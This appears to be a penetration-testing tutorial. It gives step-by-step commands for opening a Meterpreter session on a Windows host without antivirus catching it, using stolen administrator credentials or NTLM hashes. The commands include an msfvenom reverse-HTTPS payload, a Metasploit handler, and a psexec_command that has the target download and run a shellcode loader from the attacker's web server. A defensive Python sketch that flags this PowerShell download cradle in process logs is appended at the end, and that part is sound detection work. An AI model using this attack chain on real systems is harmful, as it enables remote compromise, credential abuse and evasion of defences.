In this tutorial I will walk through how to create a Meterpreter session that bypasses antivirus by injecting directly into memory without touching the disk. This method is useful when the normal psexec exploit module fails.

First, there are a couple of assumptions to start with:

  1. You can communicate with the target and the target can communicate with you.
  2. You have already obtained administrator level credentials or a hash by other means.

This tutorial will use the Invoke-Shellcode.ps1 PowerSploit module from PowerShellMafia to execute custom shellcode.

  1. Copy Invoke-Shellcode.ps1 to a local directory.
    root@Oak:~/PowerSploit# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
  2. Create the payload with msfvenom and append the output to Invoke-Shellcode.ps1 (the ps1 output format defines the $buf variable that step 6 passes to Invoke-Shellcode).
    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.38 LPORT=8443 EXITFUNC=thread -f ps1 >> Invoke-Shellcode.ps1
  3. Start Metasploit
  4. Configure a handler to receive the reverse HTTPS connection (Tip: useful for IPS evasion)
    # Select the handler
    use exploit/multi/handler
    # Set the payload. This must match what was set in msfvenom
    set payload windows/x64/meterpreter/reverse_https
    set lport 8443
    set lhost 0.0.0.0
    set exitfunc thread
    # To receive multiple meterpreter sessions set ExitOnSession false
    set ExitOnSession false
    # Run as a job
    run -j
  5. To execute the PowerShell script, we will use the psexec_command auxiliary module
    use auxiliary/admin/smb/psexec_command
  6. To both load the PowerShell script and execute it in a single command, the call to Invoke-Shellcode follows the semicolon.
    # Make sure the single quotes in the PowerShell command are escaped
    set command powershell.exe -exec bypass -Command IEX (New-Object system.Net.WebClient).DownloadString(\'http://10.0.2.38/Invoke-Shellcode.ps1\');Invoke-Shellcode -Shellcode @($buf) -Force
    set rhosts targetip
    set smbuser targetusername
    #The smbpass option can either be a password or an NTLM hash.
    set smbpass hash
    #This is optional, but I've had success with cleanup using the delay option.
    set delay 20
  7. Run a simple HTTP web server (Tip: this is handy to confirm immediately that the target was able to fetch the PowerShell script.)
  8. cd to the directory where the PowerShell script is located
  9. Start the Python web server (SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80)
    python -m SimpleHTTPServer 80
  10. Run the exploit.
  11. If all goes as planned a Meterpreter session will be opened.
    psexec_command
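From the defender's side, the chain above leaves a distinctive process-creation footprint: a service-launched cmd.exe (the SMB service execution runs under services.exe) that starts powershell.exe with an execution-policy bypass, an IEX download cradle and a call to Invoke-Shellcode. The following detection sketch is an added example, not code from the original post or from PowerSploit/Metasploit; it assumes command-line logging is enabled (Security event 4688 with command-line auditing, or Sysmon event 1) and runs over constructed sample records.

```python
"""Flag remote PowerShell download-cradle execution in process-creation events.
Added example (not part of the original post); sample events are constructed."""
import re

# Constructed records modelled on 4688 / Sysmon 1 fields (parent, image, command line).
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell.exe -exec bypass -Command IEX (New-Object "
                r"system.Net.WebClient).DownloadString('http://10.0.2.38/Invoke-Shellcode.ps1');"
                r"Invoke-Shellcode -Shellcode @($buf) -Force"},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Service"},
    {"host": "WS03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -exec bypass -File C:\scripts\backup.ps1"},
]

# (indicator name, field it applies to, pattern). One hit alone is a weak hint;
# several firing on the same event is the signal worth alerting on.
INDICATORS = [
    ("execution_policy_bypass", "cmdline",
     re.compile(r"-(exec|ep|executionpolicy)\s+bypass", re.I)),
    ("download_cradle", "cmdline",
     re.compile(r"\b(iex|invoke-expression)\b.*(downloadstring|net\.webclient|"
                r"invoke-webrequest|\biwr\b)", re.I)),
    ("reflective_loader", "cmdline", re.compile(r"invoke-shellcode|-shellcode\s+@\(", re.I)),
    ("service_launched_shell", "parent", re.compile(r"\\services\.exe$", re.I)),
]


def score_event(event):
    """Return the names of the indicators that fire for one process event."""
    return [name for name, field, pat in INDICATORS if pat.search(event[field])]


def detect(events, min_hits=2):
    """Return (host, hits) for every event with at least min_hits indicators."""
    flagged = []
    for event in events:
        hits = score_event(event)
        if len(hits) >= min_hits:
            flagged.append((event["host"], hits))
    return flagged


if __name__ == "__main__":
    for host, hits in detect(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(hits)}")
```

The threshold keeps a lone `-exec bypass` (common in legitimate admin scripts, as on WS03) from alerting while the full cradle on WS01 trips four indicators at once.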